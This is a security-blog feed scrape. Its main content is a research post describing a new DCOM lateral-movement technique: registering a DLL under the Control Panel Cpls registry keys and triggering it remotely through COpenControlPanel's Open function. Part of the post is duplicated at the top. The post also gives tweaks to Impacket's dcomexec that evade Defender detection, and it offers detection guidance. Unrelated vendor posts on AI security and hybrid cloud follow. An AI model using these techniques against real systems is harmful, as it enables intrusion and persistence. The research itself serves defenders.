Normally, checking the interface definition would require reverse engineering, so at first, it looked like we needed to take a different research path. However, it turned out that the IOpenControlPanel interface is documented on MSDN, and according to the documentation, it exposes several functions. One of them, called Open, allows a specified Control Panel item to be opened using its name as the first argument.

Full type and function definitions are provided in the shobjidl_core.h Windows header file.

Open function exposed by IOpenControlPanel interface

Open function exposed by IOpenControlPanel interface

Itโ€™s worth noting that in newer versions of Windows (e.g., Windows Server 2025 and Windows 11), Microsoft has removed interface names from the registry, which means they can no longer be identified through OleViewDotNet.

COpenControlPanel interfaces without names

COpenControlPanel interfaces without names

Returning to the COpenControlPanel COM object, I found that the Open function can trigger a DLL to be loaded into memory if it has been registered in the registry. For the purposes of this research, I created a DLL that basically just spawns a message box which is defined under the DllEntryPoint function. I registered it under HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls and then created a simple C++ COM client to call the Open function on this interface.

As expected, the DLL was loaded into memory. It was hosted in the same way that it would be if the Control Panel itself was opened: through the COM Surrogate process (dllhost.exe). Using Process Explorer, it was clear that dllhost.exe loaded my DLL while simultaneously hosting the COpenControlPanel object along with other COM objects.

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object

Based on my testing, I made the following observations:

  1. The DLL that needs to be registered does not necessarily have to be a .cpl file; any DLL with a valid entry point will be loaded.
  2. The Open() function accepts the name of a Control Panel item as its first argument. However, it appears that even if a random string is supplied, it still causes all DLLs registered in the relevant registry location to be loaded into memory.

Now, what if we could trigger this COM object remotely? In other words, what if it is not just a COM object but also a DCOM object? To verify this, we checked the AppID of the COpenControlPanel object using OleViewDotNet.

COpenControlPanel object in OleViewDotNet

COpenControlPanel object in OleViewDotNet

Both the launch and access permissions are empty, which means the object will follow the systemโ€™s default DCOM security policy. By default, members of the Administrators group are allowed to launch and access the DCOM object.

Based on this, we can build a remote strategy. First, upload the โ€œmaliciousโ€ DLL, then use the Remote Registry service to register it in the appropriate registry location. Finally, use a trigger acting as a DCOM client to remotely invoke the Open() function, causing our DLL to be loaded. The diagram below illustrates the flow of this approach.

Malicious DLL loading using DCOM

Malicious DLL loading using DCOM

The trigger can be written in either C++ or Python, for example, using Impacket. I chose Python because of its flexibility. The trigger itself is straightforward: we define the DCOM class, the interface, and the function to call. The full code example can be found here.

Once the trigger runs, the behavior will be the same as when executing the COM client locally: our DLL will be loaded through the COM Surrogate process (dllhost.exe).

As you can see, this technique not only achieves command execution but also provides persistence. It can be triggered in two ways: when a user opens the Control Panel or remotely at any time via DCOM.

Detection

The first step in detecting such activity is to check whether any Control Panel items have been registered under the following registry paths:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

Although commonly known best practices and research papers regarding Windows security advise monitoring only the first subkey, for thorough coverage it is important to monitor all of the above.

In addition, monitoring dllhost.exe (COM Surrogate) for unusual COM objects such as COpenControlPanel can provide indicators of malicious activity.
Finally, it is always recommended to monitor Remote Registry usage because it is commonly abused in many types of attacks, not just in this scenario.

Conclusion

In conclusion, I hope this research has clarified yet another attack vector and emphasized the importance of implementing hardening practices. Below are a few closing points for security researchers to take into account:

  • As shown, DCOM represents a large attack surface. Windows exposes many DCOM classes, a significant number of which lack type libraries โ€“ meaning reverse engineering can reveal additional classes that may be abused for lateral movement.
  • Changing registry values to register malicious CPLs is not good practice from a red teaming ethics perspective. Defender products tend to monitor common persistence paths, but Control Panel applets can be registered in multiple registry locations, so there is always a gap that can be exploited.
  • Bitness also matters. On x64 systems, loading a 32-bit DLL will spawn a 32-bit COM Surrogate process (dllhost.exe *32). This is unusual on 64-bit hosts and therefore serves as a useful detection signal for defenders and an interesting red flag for red teamers to consider.

Yet another DCOM object for lateral movement

19 December 2025 at 09:00

Introduction

If youโ€™re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects.

Over the years, many different DCOM objects have been discovered. Some rely on native Windows components, others depend on third-party software such as Microsoft Office, and some are undocumented objects found through reverse engineering. While certain objects still work, others no longer function in newer versions of Windows.

This research presents a previously undescribed DCOM object that can be used for both command execution and potential persistence. This new technique abuses older initial access and persistence methods through Control Panel items.

First, we will discuss COM technology. After that, we will review the current state of the Impacket dcomexec script, focusing on objects that still function, and discuss potential fixes and improvements, then move on to techniques for enumerating objects on the system. Next, we will examine Control Panel items, how adversaries have used them for initial access and persistence, and how these items can be leveraged through a DCOM object to achieve command execution.

Finally, we will cover detection strategies to identify and respond to this type of activity.

COM/DCOM technology

What is COM?

COM stands for Component Object Model, a Microsoft technology that defines a binary standard for interoperability. It enables the creation of reusable software components that can interact at runtime without the need to compile COM libraries directly into an application.

These software components operate in a clientโ€“server model. A COM object exposes its functionality through one or more interfaces. An interface is essentially a collection of related member functions (methods).

COM also enables communication between processes running on the same machine by using local RPC (Remote Procedure Call) to handle cross-process communication.

Terms

To ensure a better understanding of its structure and functionality, letโ€™s revise COM-related terminology.

  1. COM interface
    A COM interface defines the functionality that a COM object exposes. Each COM interface is identified by a unique GUID known as the IID (Interface ID). All COM interfaces can be found in the Windows Registry under HKEY_CLASSES_ROOT\Interface, where they are organized by GUID.
  2. COM class (COM CoClass)
    A COM class is the actual implementation of one or more COM interfaces. Like COM interfaces, classes are identified by unique GUIDs, but in this case the GUID is called the CLSID (Class ID). This GUID is used to locate the COM server and activate the corresponding COM class.

    All COM classes must be registered in the registry under HKEY_CLASSES_ROOT\CLSID, where each classโ€™s GUID is stored. Under each GUID, you may find multiple subkeys that serve different purposes, such as:

    • InprocServer32/LocalServer32: Specifies the system path of the COM server where the class is defined. InprocServer32 is used for in-process servers (DLLs), while LocalServer32 is used for out-of-process servers (EXEs). Weโ€™ll describe this in more detail later.
    • ProgID: A human-readable name assigned to the COM class.
    • TypeLib: A binary description of the COM class (essentially documentation for the class).
    • AppID: Used to describe security configuration for the class.
  3. COM server
    A COM is the module where a COM class is defined. The server can be implemented as an EXE, in which case it is called an out-of-process server, or as a DLL, in which case it is called an in-process server. Each COM server has a unique file path or location in the system. Information about COM servers is stored in the Windows Registry. The COM runtime uses the registry to locate the server and perform further actions. Registry entries for COM servers are located under the HKEY_CLASSES_ROOT root key for both 32- and 64-bit servers.
Component Object Model implementation

Component Object Model implementation

Clientโ€“server model

  1. In-process server
    In the case of an in-process server, the server is implemented as a DLL. The client loads this DLL into its own address space and directly executes functions exposed by the COM object. This approach is efficient since both client and server run within the same process.
    In-process COM server

    In-process COM server

  2. Out-of-process server
    Here, the server is implemented and compiled as an executable (EXE). Since the client cannot load an EXE into its address space, the server runs in its own process, separate from the client. Communication between the two processes is handled via ALPC (Advanced Local Procedure Call) ports, which serve as the RPC transport layer for COM.
Out-of-process COM server

Out-of-process COM server

What is DCOM?

DCOM is an extension of COM where the D stands for Distributed. It enables the client and server to reside on different machines. From the userโ€™s perspective, there is no difference: DCOM provides an abstraction layer that makes both the client and the server appear as if they are on the same machine.

Under the hood, however, COM uses TCP as the RPC transport layer to enable communication across machines.

Distributed COM implementation

Distributed COM implementation

Certain requirements must be met to extend a COM object into a DCOM object. The most important one for our research is the presence of the AppID subkey in the registry, located under the COM CLSID entry.

The AppID value contains a GUID that maps to a corresponding key under HKEY_CLASSES_ROOT\AppID. Several subkeys may exist under this GUID. Two critical ones are:

  • AccessPermission: controls access permissions.
  • LaunchPermission: controls activation permissions.

These registry settings grant remote clients permissions to activate and interact with DCOM objects.

Lateral movement via DCOM

After attackers compromise a host, their next objective is often to compromise additional machines. This is what we call lateral movement. One common lateral movement technique is to achieve remote command execution on a target machine. There are many ways to do this, one of which involves abusing DCOM objects.

In recent years, many DCOM objects have been discovered. This research focuses on the objects exposed by the Impacket script dcomexec.py that can be used for command execution. More specifically, three exposed objects are used: ShellWindows, ShellBrowserWindow and MMC20.

  1. ShellWindows
    ShellWindows was one of the first DCOM objects to be identified. It represents a collection of open shell windows and is hosted by explorer.exe, meaning any COM client communicates with that process.

    In Impacketโ€™s dcomexec.py, once an instance of this COM object is created on a remote machine, the script provides a semi-interactive shell.

    Each time a user enters a command, the function exposed by the COM object is called. The command output is redirected to a file, which the script retrieves via SMB and displays back to simulate a regular shell.

    Internally, the script runs this command when connecting:

    cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__17602 2>&1

    This sets the working directory to C:\ and redirects the output to the ADMIN$ share under the filename __17602. After that, the script checks whether the file exists; if it does, execution is considered successful and the output appears as if in a shell.

    When running dcomexec.py against Windows 10 and 11 using the ShellWindows object, the script hangs after confirming SMB connection initialization and printing the SMB banner. As I mentioned in my personal blog post, it appears that this DCOM object no longer has permission to write to the ADMIN$ share. A simple fix is to redirect the output to a directory the DCOM object can write to, such as the Temp folder. The Temp folder can then be accessed under the same ADMIN$ share. A small change in the code resolves the issue. For example:

    OUTPUT_FILENAME = 'Temp\\__' + str(time.time())[:5]

  2. ShellBrowserWindow
    The ShellBrowserWindow object behaves almost identically to ShellWindows and exhibits the same behavior on Windows 10. The same workaround that we used for ShellWindows applies in this case. However, on Windows 11, this object no longer works for command execution.
  3. MMC20
    The MMC20.Application COM object is the automation interface for Microsoft Management Console (MMC). It exposes methods and properties that allow MMC snap-ins to be automated.

    This object has historically worked across all Windows versions. Starting with Windows Server 2025, however, attempting to use it triggers a Defender alert, and execution is blocked.

    As shown in earlier examples, the dcomexec.py script writes the command output to a file under ADMIN$, with a filename that begins with __:

    OUTPUT_FILENAME = '__' + str(time.time())[:5]

    Defender appears to check for files written under ADMIN$ that start with __, and when it detects one, it blocks the process and alerts the user. A quick fix is to simply remove the double underscores from the output filename.

    Another way to bypass this issue is to use the same workaround used for ShellWindows โ€“ redirecting the output to the Temp folder. The table below outlines the status of these objects across different Windows versions.

    Windows Server 2025 Windows Server 2022 Windows 11 Windows 10
    ShellWindows Doesnโ€™t work Doesnโ€™t work Works but needs a fix Works but needs a fix
    ShellBrowserWindow Doesnโ€™t work Doesnโ€™t work Doesnโ€™t work Works but needs a fix
    MMC20 Detected by Defender Works Works Works

Enumerating COM/DCOM objects

The first step to identifying which DCOM objects could be used for lateral movement is to enumerate them. By enumerating, I donโ€™t just mean listing the objects. Enumeration involves:

  • Finding objects and filtering specifically for DCOM objects.
  • Identifying their interfaces.
  • Inspecting the exposed functions.

Automating enumeration is difficult because most COM objects lack a type library (TypeLib). A TypeLib acts as documentation for an object: which interfaces it supports, which functions are exposed, and the definitions of those functions. Even when TypeLibs are available, manual inspection is often still required, as we will explain later.

There are several approaches to enumerating COM objects depending on their use cases. Next, weโ€™ll describe the methods I used while conducting this research, taking into account both automated and manual methods.

  1. Automation using PowerShell
    In PowerShell, you can use .NET to create and interact with DCOM objects. Objects can be created using either their ProgID or CLSID, after which you can call their functions (as shown in the figure below).
    Shell.Application COM object function list in PowerShell

    Shell.Application COM object function list in PowerShell

    Under the hood, PowerShell checks whether the COM object has a TypeLib and implements the IDispatch interface. IDispatch enables late binding, which allows runtime dynamic object creation and function invocation. With these two conditions met, PowerShell can dynamically interact with COM objects at runtime.

    Our strategy looks like this:

    As you can see in the last box, we perform manual inspection to look for functions with names that could be of interest, such as Execute, Exec, Shell, etc. These names often indicate potential command execution capabilities.

    However, this approach has several limitations:

    • TypeLib requirement: Not all COM objects have a TypeLib, so many objects cannot be enumerated this way.
    • IDispatch requirement: Not all COM objects implement the IDispatch interface, which is required for PowerShell interaction.
    • Interface control: When you instantiate an object in PowerShell, you cannot choose which interface the instance will be tied to. If a COM class implements multiple interfaces, PowerShell will automatically select the one marked as [default] in the TypeLib. This means that other non-default interfaces, which may contain additional relevant functionality, such as command execution, could be overlooked.
  2. Automation using C++
    As you might expect, C++ is one of the languages that natively supports COM clients. Using C++, you can create instances of COM objects and call their functions via header files that define the interfaces.However, with this approach, we are not necessarily interested in calling functions directly. Instead, the goal is to check whether a specific COM object supports certain interfaces. The reasoning is that many interfaces have been found to contain functions that can be abused for command execution or other purposes.

    This strategy primarily relies on an interface called IUnknown. All COM interfaces should inherit from this interface, and all COM classes should implement it.The IUnknown interface exposes three main functions. The most important is QueryInterface(), which is used to ask a COM object for a pointer to one of its interfaces.So, the strategy is to:

    • Enumerate COM classes in the system by reading CLSIDs under the HKEY_CLASSES_ROOT\CLSID key.
    • Check whether they support any known valuable interfaces. If they do, those classes may be leveraged for command execution or other useful functionality.

    This method has several advantages:

    • No TypeLib dependency: Unlike PowerShell, this approach does not require the COM object to have a TypeLib.
    • Use of IUnknown: In C++, you can use the QueryInterface function from the base IUnknown interface to check if a particular interface is supported by a COM class.
    • No need for interface definitions: Even without knowing the exact interface structure, you can obtain a pointer to its virtual function table (vtable), typically cast as a void*. This is enough to confirm the existence of the interface and potentially inspect it further.

    The figure below illustrates this strategy:

    This approach is good in terms of automation because it eliminates the need for manual inspection. However, we are still only checking well-known interfaces commonly used for lateral movement, while potentially missing others.

  3. Manual inspection using open-source tools

    As you can see, automation can be difficult since it requires several prerequisites and, in many cases, still ends with a manual inspection. An alternative approach is manual inspection using a tool called OleViewDotNet, developed by James Forshaw. This tool allows you to:
    • List all COM classes in the system.
    • Create instances of those classes.
    • Check their supported interfaces.
    • Call specific functions.
    • Apply various filters for easier analysis.
    • Perform other inspection tasks.
    Open-source tool for inspecting COM interfaces

    Open-source tool for inspecting COM interfaces

    One of the most valuable features of this tool is its naming visibility. OleViewDotNet extracts the names of interfaces and classes (when available) from the Windows Registry and displays them, along with any associated type libraries.

    This makes manual inspection easier, since you can analyze the names of classes, interfaces, or type libraries and correlate them with potentially interesting functionality, for example, functions that could lead to command execution or persistence techniques.

Control Panel items as attack surfaces

Control Panel items allow users to view and adjust their computer settings. These items are implemented as DLLs that export the CPlApplet function and typically have the .cpl extension. Control Panel items can also be executables, but our research will focus on DLLs only.

Control Panel items

Control Panel items

Attackers can abuse CPL files for initial access. When a user executes a malicious .cpl file (e.g., delivered via phishing), the system may be compromised โ€“ a technique mapped to MITRE ATT&CK T1218.002.

Adversaries may also modify the extensions of malicious DLLs to .cpl and register them in the corresponding locations in the registry.

  • Under HKEY_CURRENT_USER:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • Under HKEY_LOCAL_MACHINE:
    • For 64-bit DLLs:
      HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
    • For 32-bit DLLs:
      HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

These locations are important when Control Panel DLLs need to be available to the current logged-in user or to all users on the machine. However, the โ€œControl Panelโ€ subkey and its โ€œCplsโ€ subkey under HKCU should be created manually, unlike the โ€œControl Panelโ€ and โ€œCplsโ€ subkeys under HKLM, which are created automatically by the operating system.

Once registered, the DLL (CPL file) will load every time the Control Panel is opened, enabling persistence on the victimโ€™s system.

Itโ€™s worth noting that even DLLs that do not comply with the CPL specification, do not export CPlApplet, or do not have the .cpl extension can still be executed via their DllEntryPoint function if they are registered under the registry keys listed above.

There are multiple ways to execute Control Panel items:

  • From cmd: control.exe [filename].cpl
  • By double-clicking the .cpl file.

Both methods use rundll32.exe under the hood:

rundll32.exe shell32.dll,Control_RunDLL [filename].cpl

This calls the Control_RunDLL function from shell32.dll, passing the CPL file as an argument. Everything inside the CPlApplet function will then be executed.

However, if the CPL file has been registered in the registry as shown earlier, then every time the Control Panel is opened, the file is loaded into memory through the COM Surrogate process (dllhost.exe):

COM Surrogate process loading the CPL file

COM Surrogate process loading the CPL file

What happened was that a Control Panel with a COM client used a COM object to load these CPL files. We will talk about this COM object in more detail later.

The COM Surrogate process was designed to host COM server DLLs in a separate process rather than loading them directly into the client processโ€™s address space. This isolation improves stability for the in-process server model. This hosting behavior can be configured for a COM object in the registry if you want a COM server DLL to run inside a separate process because, by default, it is loaded in the same process.

โ€˜DCOMingโ€™ through Control Panel items

While following the manual approach of enumerating COM/DCOM objects that could be useful for lateral movement, I came across a COM object called COpenControlPanel, which is exposed through shell32.dll and has the CLSID {06622D85-6856-4460-8DE1-A81921B41C4B}. This object exposes multiple interfaces, one of which is IOpenControlPanel with IID {D11AD862-66DE-4DF4-BF6C-1F5621996AF1}.

IOpenControlPanel interface in the OleViewDotNet output

IOpenControlPanel interface in the OleViewDotNet output

I immediately thought of its potential to compromise Control Panel items, so I wanted to check which functions were exposed by this interface. Unfortunately, neither the interface nor the COM class has a type library.

COpenControlPanel interfaces without TypeLib

COpenControlPanel interfaces without TypeLib

Normally, checking the interface definition would require reverse engineering, so at first, it looked like we needed to take a different research path. However, it turned out that the IOpenControlPanel interface is documented on MSDN, and according to the documentation, it exposes several functions. One of them, called Open, allows a specified Control Panel item to be opened using its name as the first argument.

Full type and function definitions are provided in the shobjidl_core.h Windows header file.

Open function exposed by IOpenControlPanel interface

Open function exposed by IOpenControlPanel interface

Itโ€™s worth noting that in newer versions of Windows (e.g., Windows Server 2025 and Windows 11), Microsoft has removed interface names from the registry, which means they can no longer be identified through OleViewDotNet.

COpenControlPanel interfaces without names

COpenControlPanel interfaces without names

Returning to the COpenControlPanel COM object, I found that the Open function can trigger a DLL to be loaded into memory if it has been registered in the registry. For the purposes of this research, I created a DLL that basically just spawns a message box which is defined under the DllEntryPoint function. I registered it under HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls and then created a simple C++ COM client to call the Open function on this interface.

As expected, the DLL was loaded into memory. It was hosted in the same way that it would be if the Control Panel itself was opened: through the COM Surrogate process (dllhost.exe). Using Process Explorer, it was clear that dllhost.exe loaded my DLL while simultaneously hosting the COpenControlPanel object along with other COM objects.

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object

Based on my testing, I made the following observations:

  1. The DLL that needs to be registered does not necessarily have to be a .cpl file; any DLL with a valid entry point will be loaded.
  2. The Open() function accepts the name of a Control Panel item as its first argument. However, it appears that even if a random string is supplied, it still causes all DLLs registered in the relevant registry location to be loaded into memory.

Now, what if we could trigger this COM object remotely? In other words, what if it is not just a COM object but also a DCOM object? To verify this, we checked the AppID of the COpenControlPanel object using OleViewDotNet.

COpenControlPanel object in OleViewDotNet

COpenControlPanel object in OleViewDotNet

Both the launch and access permissions are empty, which means the object will follow the systemโ€™s default DCOM security policy. By default, members of the Administrators group are allowed to launch and access the DCOM object.

Based on this, we can build a remote strategy. First, upload the โ€œmaliciousโ€ DLL, then use the Remote Registry service to register it in the appropriate registry location. Finally, use a trigger acting as a DCOM client to remotely invoke the Open() function, causing our DLL to be loaded. The diagram below illustrates the flow of this approach.

Malicious DLL loading using DCOM

Malicious DLL loading using DCOM

The trigger can be written in either C++ or Python, for example, using Impacket. I chose Python because of its flexibility. The trigger itself is straightforward: we define the DCOM class, the interface, and the function to call. The full code example can be found here.

Once the trigger runs, the behavior will be the same as when executing the COM client locally: our DLL will be loaded through the COM Surrogate process (dllhost.exe).

As you can see, this technique not only achieves command execution but also provides persistence. It can be triggered in two ways: when a user opens the Control Panel or remotely at any time via DCOM.

Detection

The first step in detecting such activity is to check whether any Control Panel items have been registered under the following registry paths:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

Although commonly known best practices and research papers regarding Windows security advise monitoring only the first subkey, for thorough coverage it is important to monitor all of the above.

In addition, monitoring dllhost.exe (COM Surrogate) for unusual COM objects such as COpenControlPanel can provide indicators of malicious activity.
Finally, it is always recommended to monitor Remote Registry usage because it is commonly abused in many types of attacks, not just in this scenario.

Conclusion

In conclusion, I hope this research has clarified yet another attack vector and emphasized the importance of implementing hardening practices. Below are a few closing points for security researchers to take into account:

  • As shown, DCOM represents a large attack surface. Windows exposes many DCOM classes, a significant number of which lack type libraries โ€“ meaning reverse engineering can reveal additional classes that may be abused for lateral movement.
  • Changing registry values to register malicious CPLs is not good practice from a red teaming ethics perspective. Defender products tend to monitor common persistence paths, but Control Panel applets can be registered in multiple registry locations, so there is always a gap that can be exploited.
  • Bitness also matters. On x64 systems, loading a 32-bit DLL will spawn a 32-bit COM Surrogate process (dllhost.exe *32). This is unusual on 64-bit hosts and therefore serves as a useful detection signal for defenders and an interesting red flag for red teamers to consider.

From the Hill: The AI-Cybersecurity Imperative in Financial Services

18 December 2025 at 15:00

The transformative potential of artificial intelligence (AI) across industries is undeniable. But realizing AI's true value hinges on three cybersecurity imperatives: Understanding the AI-cybersecurity nexus, harnessing AI to supercharge cyber defense, and embedding security into AI tools from the ground up through Secure AI by Design.

Nowhere is this convergence more urgent than in financial services. Sitting at the center of our global economy, financial institutions face a dual mandate: Embrace AI for cybersecurity and cybersecurity for AI.

I was honored to cover these key principals in my testimony before the House Committee on Financial Services, led by Chairman French Hill. The hearing, entitled โ€œFrom Principles to Policy: Enabling 21st Century AI Innovation in Financial Servicesโ€ convened witnesses from Palo Alto Networks, Google, NASDAQ, Zillow and Public Citizen. Together, we examined AI use cases in the financial services and housing sectors, including those specific to cybersecurity. We assessed how existing laws and frameworks apply in the age of AI.

The Defense Advantage Is AI-Powered Security Operations

Attacks have become faster, with the time from compromise to data exfiltration now 100 times faster than four years ago. The financial sector bears disproportionate risk, given the value of its data and interconnected systems, while firms contend with evolving regulatory expectations, talent shortages and the persistent tendency to elevate cybersecurity only after an incident.

Generative and agentic AI intensify these pressures by accelerating every phase of the attack chain, from deepfake-driven fraud to tailored spear phishing campaigns. Our researchers at Unit 42ยฎ have found that agentic AI, autonomous systems that can reason and act without human intervention, can compress what was once a multiday ransomware campaign into roughly 25 minutes.

To keep pace, financial institutions must pivot to AI-driven defenses that operate at machine speed.

Security operations centers (SOC) have long been overwhelmed by traditional alerts and fragmented data. Security teams, forced into manual triage across dozens of disparate tools, face an inefficient model that leaves vulnerabilities exposed, burns out analysts and makes it impossible to operate at the speed necessary to outpace modern attacks.

The average enterprise SOC ingests data from 83 security solutions across 29 vendors. In 75% of breaches, logging existed that should have flagged anomalous behavior, but critical signals were buried. With 90% of SOCs still relying on manual processes, adversaries have the clear advantage.

AI-driven SOCs flip this paradigm, acting as a force multiplier to substantially reduce detection and response times. To illustrate the scale of this necessity, consider our own security operations. Palo Alto Networks SOC analyzes over 90 billion events daily. Without AI, this would be an impossible task for human analysts. But by applying AI, we distill that down to a single actionable incident.

Financial institutions migrating to AI-driven SOC platforms are seeing transformative results:

  • One customer reduced the Mean Time to Respond (MTTR) from one day to 14 minutes.
  • Another prevented 22,831 threats and processed 113,271 threat indicators in less than 5 seconds.
  • A large bank saved 180 hours per year by automating security information and event management reporting; 500 hours through automated data collection; 360 hours by automating four Chief Technology Officer playbooks; and 240 hours with automated threat intelligence enrichment.

These improvements are critical to stopping threat actors. But none of this would be possible without AI.

Securing the New AI Attack Surface

As AI adoption grows, it will further expand the attack surface, creating new vectors targeting training data and model environments. AI's rapid growth is outpacing the adoption of security measures designed to protect it. Nearly three-quarters of S&P 500 companies now flag AI as a material risk in their public disclosures, up from just 12% in 2023.

Traditional security tools rely on static rules that miss advanced attacks, like multistep prompt injections or adversarial manipulations. Autonomous AI agents can take unpredictable actions that are difficult to monitor with legacy methods.

Rapid AI adoption has exposed organizations' infrastructure, data, models, applications and agents to unique threats. Unlike traditional cyber exploits that target software vulnerabilities, AI-specific attacks can manipulate the foundation of how an AI system learns and operates.

A Secure AI by Design

Even with an understanding of the risks, many organizations struggle with the lack of clarity on what effective AI security looks like in practice. Recognizing the gap between intent and execution, Palo Alto Networks developed a Secure AI by Design policy roadmap that provides organizations with a comprehensive roadmap that integrates security throughout the entire AI lifecycle.

A proactive stance ensures security is a feature, not an afterthought, crucial for building trust, maintaining compliance and mitigating risks. The approach addresses four imperatives organizations most pressingly face in AI adoption:

1. Secure the use of external AI tools.

2. Secure the underlying AI infrastructure and data.

3. Safely build and deploy AI applications.

4. Monitor and control AI agents.

The Path Forward

For financial institutions, Secure AI by Design must be anchored in enterprise governance. Institutions should maintain risk-tiered AI inventories, enforce strict access controls and implement testing commensurate with risk. Governance structures should enable board oversight and align with established model risk practices.

Policymakers also have a critical role to play in promoting AI-driven security operations, championing voluntary Secure AI by Design frameworks, ensuring policies safeguard innovation, enabling controlled experimentation and strengthening public-private collaboration.

Ultimately, the financial institutions that will thrive will recognize cybersecurity as the foundation that makes innovation possible. By embracing AI-driven defenses and securing AI systems from the ground up, the sector can confidently unlock AI's transformative potential while safeguarding the trust and stability that underpin the global economy.

Read the full testimony to learn more about how cybersecurity can enable AI innovation in financial services.

The post From the Hill: The AI-Cybersecurity Imperative in Financial Services appeared first on Palo Alto Networks Blog.

Check Point Infinity Global Services Launches First AI Security Training Courses

18 December 2025 at 13:00

Artificial Intelligence is transforming every industry, unlocking new opportunities while introducing new risks. That is why Infinity Global Services (IGS) is proud to announce the launch of our first dedicated AI security training courses. This is the first release in a growing IGS AI services portfolio, with upcoming offerings focused on AI red teaming, AI governance and AI implantation consulting services. The new courses are part of Infinity Global Servicesโ€™ mission to empower organizations with the knowledge and tools to defend against emerging AI-driven threats and implementing AI securely in their operations and product development. Through hands-on training and expert-led [โ€ฆ]

The post Check Point Infinity Global Services Launches First AI Security Training Courses appeared first on Check Point Blog.

Untangling Hybrid Cloud Security

From Fragmented Fences to Cohesive Control

The attack surface for todayโ€™s enterprises is incredibly heterogeneous and dynamic. Applications and data are in constant motion, spanning public clouds, private data centers and edge locations. Users connect from anywhere.

For security leaders, this environment has led to an explosion in not only operational complexity, but in many cases, uncertainty. โ€‹โ€‹Together, Nutanix and Palo Alto Networks enable security to finally match the speed and scale of these dynamic hybrid cloud environments.

The security ecosystem has become vast and complex. Point solutions accumulate to address specific gaps, yet each adds another interface, another policy language and another integration to manage. However well intentioned, this sprawl can lead directly to fractured visibility, overlapping tools and operational fatigue.

Elevate Perimeter Protection to Defense-in-Depth

Enterprises today face unprecedented security complexity as hybrid and multicloud environments become the new normal. Currently, 94% of enterprises use some form of cloud service, while 89% report having a multicloud strategy in place. This distributed reality means security is paramount: while managing cloud spending is the number one operational challenge (82% overall), security remains a major concern, affecting 79% of all organizations.

Hybrid cloud adoption offers agility, but it also introduces distinct security challenges that strain traditional approaches. Adversaries have taken notice. Hybrid and multicloud environments are prime targets because they connect sensitive data, privileged accounts and critical systems across public, and on-premises infrastructure. Perimeter-based security models, built for static networks and centralized data centers, cannot keep pace in a world where apps and data continuously move between platforms.

Defense-in-depth has become essential for addressing the inherent dynamism of todayโ€™s environments. Network visibility is required to monitor and contain east-west traffic and lateral movement of threats inside cloud environments. Identity controls must verify every user, device and interaction across a distributed workforce. Data protection must follow sensitive information as it traverses multiple clouds, data centers and edge locations.

Yet managing these protections as distinct layers is no longer viable. Each cloud provider introduces its own native security controls. Each additional tool adds another interface and another policy set to maintain. Defense-in-depth only achieves its purpose when its layers are fully unified, providing consistent control enforcement from the edge to the core, comprehensive visibility across traffic, and essential data protections for all workloads, wherever they reside.

Freedom of Choice Without Fragmentation

Hybrid environments span public clouds, private infrastructure, SaaS ecosystems and legacy on-premises systems. No single vendor can realistically cover that entire landscape, and forcing security into a single closed ecosystem risks creating gaps where those environments meet.

The answer lies in an open ecosystem approach that allows organizations to assemble best-of-breed capabilities rather than being locked into a single providerโ€™s stack.

This flexibility empowers security teams to adapt to the unique requirements of each environment while still operating through a unified security model. Policies can be applied consistently, intelligence can be shared across layers, and protections can move in step with workloads, regardless of platform. In short, this model can effectively support freedom of choice while relieving the operational burden of managing hybrid and multicloud security.

A Unified Security Layer Across Every Environment

Open ecosystems solve the problem of choice. What remains is the challenge of bringing those best-of-breed capabilities together into a solution that is coherent and scalable.

To transform defense-in-depth from a conceptual framework into a practical system aligned to the realities of hybrid and multicloud deployments, this unified layer should be built on core capabilities:

  • Inline visibility for east-west traffic within virtualized and cloud environments, enabled by deploying next-generation firewalls directly inside virtual private networks:
    This approach inspects workload-to-workload traffic, identifies anomalous behavior and stops lateral movement before it spreads.
  • Consistent policy enforcement across public cloud, private data centers and edge locations through a centralized management plane:
    A single set of policies should be authored once and pushed everywhere, assuring a consistent security posture across all clouds and environments.
  • Abstraction of security intent from network coordinates through tag-driven automation, an approach that allows security policies to be expressed in terms of workload attributes (rather than IPs or locations):
    These protections follow workloads automatically as they move. Through integration with orchestration pipelines, this approach aligns controls with rapid application rollouts in CI/CD workflows, all without manual reconfiguration.

With these core capabilities, security can finally catch up to the fluidity promised by hybrid cloud operating models.

Explore how Palo Alto Networks and Nutanix, work together to make this unified vision a reality, including joint offerings, like Palo Alto Networks secured Nutanix clusters with VM-Series Firewalls for AWSยฎ and Microsoftยฎ Azure.

The post Untangling Hybrid Cloud Security appeared first on Palo Alto Networks Blog.

โŒ